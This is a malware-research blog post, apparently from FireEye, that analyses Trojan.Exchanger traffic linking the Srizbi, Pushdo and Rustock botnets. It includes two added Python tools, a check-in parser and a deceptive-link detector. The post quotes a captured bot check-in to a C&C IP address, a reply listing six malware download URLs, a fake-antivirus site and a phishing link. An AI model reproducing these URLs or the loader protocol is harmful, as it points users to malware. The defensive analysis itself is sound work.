Some malware researchers have described Srizbi and Rustock as rival botnets; our data indicates that this
apparent rivalry is a sibling rivalry at best. Srizbi and Rustock seem to be supported (controlled) by the
same parent (bot herder).
Today I have seen the same carrier (Trojan.Exchanger) downloading six binaries in its next-stage downloads,
and the results really surprised me. The exchange below is clear CnC communication.
From the bot comes the HTTP POST request:
POST /ldr/client03/ldrctl.php HTTP/1.1
Connection: Close
Content-Type: application/x-www-form-urlencoded
User-Agent: User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 74.50.109.2
Content-Length: 94
os=2600&ver=0.0.0.51&idx=98341900-c195-11db-b262-806d6172696f&user=user&ioctl=10&data=(null)
Then, the server responds with a list of URLs for binaries:
HTTP/1.0 200 OK
Date: Fri, 15 Aug 2008 09:25:24 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 267
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
X-Cache: MISS from gateway.felabs.com
X-Cache-Lookup: MISS from gateway.felabs.com:3128
Via: 1.0 gateway.felabs.com:3128 (squid/2.6.STABLE19)
Connection: close
http://www.micro8051.com/inst_newlq.exe
http://www.micro8051.com/pre17075.exe
http://www.micro8051.com/ccka.exe
http://www.micro8051.com/outpuk23.exe
http://www.micro8051.com/scan0808101.exe
http://www.micro8051.com/scan140815.exe
D7EB6085-E70A-4f5a-9921-E6BD244A8C17
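To make the check-in above easier to log and hunt for, here is an added parser for the two messages as captured (example code written for this page, not code from the original post or from FireEye). It decodes the bot's POST into its key=value fields and splits the reply into the download URLs plus the trailing token. Two things fall out that the raw capture does not show at a glance: the reply body, newline-separated and including the GUID line, is exactly the 267 bytes the server declared, so the GUID is part of the protocol rather than stray output; and the visible POST body is 92 bytes against a declared 94, which I take to be a trailing line ending lost in the capture (an inference, not something the post states). Which fields a detector keys on, such as the literally doubled "User-Agent: User-agent:" header that no real browser emits, is this example's own assumption.

```python
"""Parse the Trojan.Exchanger loader check-in captured above.

Added example, not code from the original post or from FireEye. It splits the
bot's HTTP POST into its key=value fields and the server's reply into the list
of download URLs plus the trailing token, the two things a sandnet analyst would
log. Which fields a detector keys on (the doubled "User-Agent:" header, the fixed
ldrctl.php path) is this example's assumption, not something the post states.
"""
from urllib.parse import parse_qs, urlparse

# Request and response body as shown in the post; CRLF line endings and the
# header/body separator are reconstructed here.
REQUEST = (
    "POST /ldr/client03/ldrctl.php HTTP/1.1\r\n"
    "Connection: Close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "Host: 74.50.109.2\r\n"
    "Content-Length: 94\r\n"
    "\r\n"
    "os=2600&ver=0.0.0.51&idx=98341900-c195-11db-b262-806d6172696f"
    "&user=user&ioctl=10&data=(null)"
)

RESPONSE_BODY = (
    "http://www.micro8051.com/inst_newlq.exe\n"
    "http://www.micro8051.com/pre17075.exe\n"
    "http://www.micro8051.com/ccka.exe\n"
    "http://www.micro8051.com/outpuk23.exe\n"
    "http://www.micro8051.com/scan0808101.exe\n"
    "http://www.micro8051.com/scan140815.exe\n"
    "D7EB6085-E70A-4f5a-9921-E6BD244A8C17"
)


def split_http(raw):
    """Return (start line, lower-cased header dict, body) for one HTTP message."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_checkin(raw):
    """Decode the bot's POST: request path, host, form fields and header quirks."""
    start, headers, body = split_http(raw)
    method, path, _version = start.split(" ", 2)
    # keep_blank_values so an empty field still shows up in the log
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    ua = headers.get("user-agent", "")
    return {
        "method": method,
        "path": path,
        "host": headers.get("host", ""),
        "fields": fields,
        # The sample's header literally reads "User-Agent: User-agent: Mozilla/...",
        # a malformed value a real browser never sends, hence a cheap detection hook.
        "ua_doubled": ua.lower().startswith("user-agent:"),
        "declared_length": int(headers.get("content-length", "0")),
        "actual_length": len(body.encode()),
    }


def parse_download_list(body):
    """Split the reply into download URLs and any non-URL trailing token."""
    urls, extra = [], []
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        if urlparse(line).scheme in ("http", "https"):
            urls.append(line)
        else:
            extra.append(line)
    return urls, extra


def body_matches_declared_length(body, declared):
    """True when the reply body is exactly as long as the Content-Length header says."""
    return len(body.encode()) == declared


if __name__ == "__main__":
    info = parse_checkin(REQUEST)
    print(info["path"], info["fields"], "doubled UA:", info["ua_doubled"])
    urls, extra = parse_download_list(RESPONSE_BODY)
    print(len(urls), "payload URLs; trailing token(s):", extra)
    print("Content-Length 267 matches:", body_matches_declared_length(RESPONSE_BODY, 267))
```

Run on the capture, the parser reports six payload URLs, the GUID as the single trailing token, and the doubled User-Agent flag set; the same two functions can be pointed at proxy logs from a sandnet (the Via header above shows this capture already went through a squid gateway) to pull out the download list from later check-ins.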
So, what are these binaries? My curiosity set in.
http://www.micro8051.com/inst_newlq.exe
OK, this is identified to be Srizbi.
http://www.micro8051.com/pre17075.exe
OK, this happens to be Pushdo.
http://www.micro8051.com/ccka.exe
Well, we have an updated version of the malware itself - Trojan.Exchanger.
http://www.micro8051.com/outpuk23.exe
This seems to do nothing during the limited time it spent in my sandnet. On VirusTotal, only 4
AVs identified it, and only with generic names.
http://www.micro8051.com/scan0808101.exe
Well, this one simply crashes. Maybe it's not baked enough? That's all the time I could
spend on it for now.
http://www.micro8051.com/scan140815.exe
OK, this is one of those fake-AV social engineering schemes that you may have heard of before.
This is the downloader for a fake AV. It downloads AntivirusXP2008Installer.exe from
the site www.antivirusxp-2008.net. This fake AV then tells the user that his/her PC is infected
and pushes the user to buy the fake AV from www.antivirusxp-2008.net.
So, what have we got here? On the one hand, this Trojan.Exchanger-infected VM is generating
Pushdo and Srizbi CnC traffic at the same time; on the other, another sample of Trojan.Exchanger
which is still running in my lab has downloaded Rustock. This is strong evidence for my old theory
that all the top HTTP botnets hosted at McColo Corporation, including Srizbi, Pushdo and
Rustock, belong to the same gang on the RBN (Russian Business Network).
By the way, here are some of the more recent email subjects used by the Rustock running in my sandnet:
msnbc.com: BREAKING NEWS: London named top literary destination
msnbc.com: BREAKING NEWS: Italy takes "hit and run" holiday as economy slows
msnbc.com: BREAKING NEWS: Tories say NHS dental bills rising alarmingly
msnbc.com: BREAKING NEWS: Girl found with arms cut off, police investigate
Here is an example link in the email that is designed to trick the email recipient:
Find out more at http://breakingnews.msnbc.com
While the overlaid caption is http://breakingnews.msnbc.com, which looks like a site for
breaking news at MSNBC.COM, the actual URL is http://BAD-desperate-bk.ru/msnonline.html.
What awaits the tricked user there is a fake Flash media player download, the now
well-known binary named adobe_flash.exe. Please note that the malicious host name has been
modified with a "BAD-" prefix for reader protection.
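The caption-versus-href mismatch described above is exactly the property a mail filter can check mechanically. Here is an added detector for it (example code written for this page, not code from the original post or from FireEye): it collects every anchor in an HTML body, and for each anchor whose visible text itself looks like a URL, compares the site the caption names against the site the href actually points to. The sample message is constructed here to reproduce the link shape the post describes, keeping the author's "BAD-" redaction of the malicious host, together with an honest anchor so the detector's selectivity is visible. Collapsing hosts to their last two labels is a deliberate simplification noted in the code; a production filter would use the public suffix list.

```python
"""Flag e-mail links whose visible text names one site but whose href goes elsewhere.

Added example, not code from the original post or from FireEye. The post describes
a Rustock mail whose link caption reads http://breakingnews.msnbc.com while the href
points at the (redacted) BAD-desperate-bk.ru host; the HTML below is constructed
here to reproduce that shape, with the post's "BAD-" redaction kept.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: one deceptive anchor (caption host != href host) and one
# honest anchor whose caption and href agree.
SAMPLE_EMAIL_HTML = """
<p>msnbc.com: BREAKING NEWS: London named top literary destination</p>
<p>Find out more at
   <a href="http://BAD-desperate-bk.ru/msnonline.html">http://breakingnews.msnbc.com</a></p>
<p>Published by <a href="http://www.msnbc.com/">www.msnbc.com</a></p>
"""

# A caption counts as "URL-like" if it is a scheme-optional hostname with a dot in it.
URL_LIKE = re.compile(r"^(https?://)?(www\.)?[a-z0-9-]+(\.[a-z0-9-]+)+(/\S*)?$", re.I)


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Lower-cased hostname of a URL; bare 'www.example.com' captions are accepted."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def registrable(host):
    """Last two labels of the host. Simplification: a real filter would consult the
    public suffix list so that e.g. 'example.co.uk' is not reduced to 'co.uk'."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def find_deceptive_links(html):
    """Return anchors whose caption looks like a URL but names a different site than the href."""
    collector = AnchorCollector()
    collector.feed(html)
    collector.close()
    hits = []
    for href, text in collector.anchors:
        if not URL_LIKE.match(text):
            continue  # caption is ordinary words; nothing to compare against
        shown, actual = host_of(text), host_of(href)
        if registrable(shown) != registrable(actual):
            hits.append({"caption": text, "href": href,
                         "shown_host": shown, "actual_host": actual})
    return hits


if __name__ == "__main__":
    for hit in find_deceptive_links(SAMPLE_EMAIL_HTML):
        print(f"caption says {hit['shown_host']} but the link goes to "
              f"{hit['actual_host']}: {hit['href']}")
```

On the constructed message the detector reports the msnbc.com caption pointing at the redacted .ru host and stays silent on the honest www.msnbc.com anchor; anchors whose caption is plain text ("click here") are skipped because there is no claimed destination to compare.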
Atif Mushtaq @ FireEye Malware Intelligence Labs

The Srizbi and Rustock botnets are currently two of the biggest sources of spam. Srizbi this week accounted for over 46% of the total spam that we receive, and Rustock, the third biggest source of spam, for over 12%. Last week Rustock ran a spamming campaign designed to spread malware and used fake news headlines as the subject.
------------------
Adam
Internet marketing
Posted by: Adamgilly | 2008.10.04 at 03:25 PM